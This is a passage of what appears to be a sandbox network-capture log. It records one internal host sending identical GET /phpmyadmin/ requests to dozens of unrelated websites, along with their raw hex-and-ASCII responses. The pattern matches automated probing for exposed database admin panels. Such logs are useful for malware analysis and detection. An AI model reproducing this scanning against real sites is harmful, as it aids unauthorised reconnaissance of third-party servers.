Feb 21, 2024 00:26:08.102039099 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	55720	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.053478956 CET	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.505769014 CET	378	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: http://www.netzschnipsel.de/phpmyadmin/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	55791	162.0.235.125	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.062691927 CET	182	OUT	GET /phpmyadmin/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.224971056 CET	1047	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Tue, 20 Feb 2024 23:26:08 GMT server: LiteSpeed location: https://norwegischlernen.info/phpmyadmin/ x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	55777	217.160.0.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.081737995 CET	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.469183922 CET	566	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 4d 4f 84 30 10 86 ef 26 fe 87 b1 89 47 18 c8 7a 30 4a 39 b8 1f d1 64 fd 88 61 a3 1e bb b4 2b 44 a0 b5 14 59 fc f5 d2 6e 37 72 31 91 4b cb e4 9d 99 e7 7d 9b 9c 2d 1e e7 d9 db d3 12 0a 53 57 f0 b4 b9 59 df cd 81 04 88 2f b3 39 e2 22 5b c0 eb 6d 76 bf 86 38 8c 60 a5 59 2d 5a 61 10 97 0f 04 48 61 8c ba 42 ec fb 3e ec 67 a1 d4 ef 98 3d e3 de ce 89 6d a3 bf 06 3b df 15 72 c3 49 7a 7a 92 58 85 3b 05 e3 f6 34 a5 a9 44 da 29 d8 56 9d 48 f0 f0 3b d6 6b 61 18 34 e3 4a 4a 3e c4 d0 4b cd 5b 02 b9 6c 8c 68 0c 25 04 d0 36 4f 44 5c b4 b9 2e 95 29 65 f3 87 ce 12 07 e2 b3 2b bf 28 f1 83 02 33 28 31 91 1b b1 37 68 09 af 21 2f 98 1e dd d2 4d b6 0a 2e fd 3a 2c 3c f4 d1 15 68 d9 b7 94 c4 51 74 ee cc b9 3a b4 3a a7 2e 9f 76 0c a8 53 d6 58 78 51 95 35 0b b9 40 54 85 aa 07 c6 eb b2 41 02 ce 2e 25 de 3e 01 37 60 3b 9a 15 9a 92 88 40 23 b5 68 cb ef 31 84 e3 8d 38 e3 8d 3c 20 d8 10 b6 92 0f 2e d1 f8 37 c6 22 b6 15 95 26 0c 0a 2d 76 ff c4 49 fd a3 7a e6 91 76 02 9b 20 4b c1 7e 09 2a 3b 1c 8f 7b 71 0a 83 c7 68 9c c4 3d f6 0f 32 c7 d8 b4 66 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 165MO0&Gz0J9da+DYn7r1K}-SWY/9"[mv8`Y-ZaHaB>g=m;rIzzX;4D)VH;ka4JJ>K[lh%6OD\.)e+(3(17h!/M.:,<hQt::.vSXxQ5@TA.%>7`;@#h18< .7"&-vIzv K~*;{qh=2f0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	55794	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.083317995 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.269177914 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:08 GMT server: Apache set-cookie: __tad=1708471568.6660829; expires=Fri, 17-Feb-2034 23:26:08 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	55790	13.232.255.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.190679073 CET	180	OUT	GET /phpmyadmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.471287012 CET	415	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache Location: https://amsantechnology.com/phpmyadmin/ Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	55868	13.248.243.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.190757990 CET	183	OUT	GET /phpmyadmin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.299333096 CET	319	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/phpmyadmin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:08 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:08.507435083 CET	319	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/phpmyadmin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:08 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.6	55890	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.229238033 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.325577974 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/phpmyadmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.6	55893	20.75.101.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.240940094 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.345135927 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	55864	31.193.11.2	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.250614882 CET	179	OUT	GET / HTTP/1.1 Host: www.caspianseagulltravels.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.413824081 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache Location: https://www.caspianseagulltravels.com/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.caspianseagulltravels.com/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	55908	62.210.211.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.390599012 CET	185	OUT	GET /phpmyadmin/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.550837994 CET	567	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:08 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://voltage-distribution.com/phpmyadmin/ Content-Length: 342 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://voltage-distribution.com/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.6	55923	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.395344019 CET	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: touktoukcie.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.514590025 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471568.436147754347411886 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalj5YEHgc/KekjV/90adoq/gbwdUZpOVjjbg2wDnAvIG6TrmaizDI51JRW5nqGyGO0Q==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,MP7Bu5+BLGEj45VbG6JkxLgsZcue5LfS7Y8AwDwJeQU=,/j+AjfLiOiE0Vc9NsP8sK9M+eO7SwbESnybcBl/SxK7p7Ig815JIv3PlDeV2T8WsMNdRKgFF4Pt5Hop6v392bA== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 51 e2 c4 6e 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 65 ce cd 75 0e e5 1c 7a be a0 82 06 02 39 55 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 5b 2a b6 6c da c3 2b 3b 5c ce 4e 6d f0 5b 72 8d 45 2b 61 79 c4 8c 9d 59 ad ed a2 67 d9 04 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 e6 11 ab 1c cc f2 48 88 c5 62 91 60 2c 93 c2 d6 62 26 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 23 bc 17 bd 96 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 95 98 61 2e 78 f1 2b e8 7b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 71 fa 2e 39 16 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 0f f5 67 a2 cf fc 6c 6a cb 15 d3 d2 cc f3 08 30 fe 98 Data Ascii: 443Vo6_E-Qn&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>+[72(euz9UAx_:baI81\|T5[*l+;\Nm[rE+ayYgBie5TpDcHb`,b&1$$1:\|+#HN(E+9^a.x+{@?9<U_`X=`=4toVHq.9S/r$Hglj0
Feb 21, 2024 00:26:08.514635086 CET	627	IN	Data Raw: 46 94 f4 0e 43 03 2e 8f 36 f5 72 b5 21 32 e9 59 a7 82 ca e8 2a 38 8d c1 d5 d2 7b e4 df 28 a6 7a eb 65 f5 37 df 62 0f 28 b6 94 6e c5 a7 b2 b8 9b 3b db 9a 32 be 60 ca ff b9 be f8 79 43 ff 8e b6 92 a7 3e a9 19 d3 81 dd 5c b3 77 9f 91 d2 67 29 f3 ae Data Ascii: FC.6r!2Y8{(ze7b(n;2`yC>\wg)$'tT-N>&2-z&%V.sQK^~mqr2yLf4eG>3N<5tit$'1@FNZ-A8o'9I77'0jk

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.6	55918	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:08.456126928 CET	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.631437063 CET	459	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:08 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:DA6E_D5BA2105:0050_65D53510_63904AD2:5BC8 x-iplb-instance: 52217 set-cookie: SERVERID77446=200172\|ZdU1E\|ZdU1E; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.6	55924	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
